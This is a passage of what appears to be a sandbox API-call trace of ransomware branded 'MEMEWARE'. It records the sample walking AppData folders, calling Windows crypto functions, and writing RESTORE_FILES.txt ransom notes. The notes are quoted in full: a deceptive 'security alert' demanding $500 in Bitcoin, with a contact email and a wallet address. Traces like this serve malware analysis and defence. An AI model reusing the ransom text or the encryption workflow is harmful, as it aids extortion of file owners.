pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\.") 
returned 88 [0094.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.883] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\..") returned 89 [0094.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.883] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt") returned 104 [0094.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.884] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.884] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.885] lstrlenA (lpString="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") returned 684 [0094.885] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.885] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.885] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.885] CloseHandle (hObject=0xd8) returned 1 [0094.885] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.885] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt") returned 65 [0094.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.887] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.887] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.888] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.888] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.888] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.888] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0094.888] CloseHandle (hObject=0xd4) returned 1 [0094.888] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0094.889] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 46 [0094.889] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0094.889] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0094.889] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned 48 [0094.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.891] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0094.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.891] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.") returned 48 [0094.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.891] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.891] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.891] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\." 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.891] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.892] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\..") returned 49 [0094.892] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.892] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.892] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.892] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.." 
(normalized: "c:\\users\\default\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.892] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0094.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned 58 [0094.892] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0094.892] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0094.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 60 [0094.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.893] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\.") returned 60 [0094.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.893] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.893] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.893] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.893] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.893] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.893] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.893] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.894] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.894] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.894] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\..") returned 61 [0094.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.894] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.894] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.894] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.894] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 76 [0094.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.895] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.895] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.896] lstrlenA (lpString="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") returned 684 [0094.896] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.896] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.896] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.896] CloseHandle (hObject=0xd8) returned 1 [0094.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0094.896] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned 53 [0094.896] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0094.896] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned 55 [0094.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.897] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.897] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\.") returned 55 [0094.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.897] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.897] lstrcmpW 
(lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.897] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.897] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.897] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.897] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\..") returned 56 [0094.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.898] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.898] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.898] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 
[0094.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.898] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0094.898] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 57 [0094.898] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0094.898] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0094.898] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned 59 [0094.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.898] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.899] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.899] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.") returned 59 [0094.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.899] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.899] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.899] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 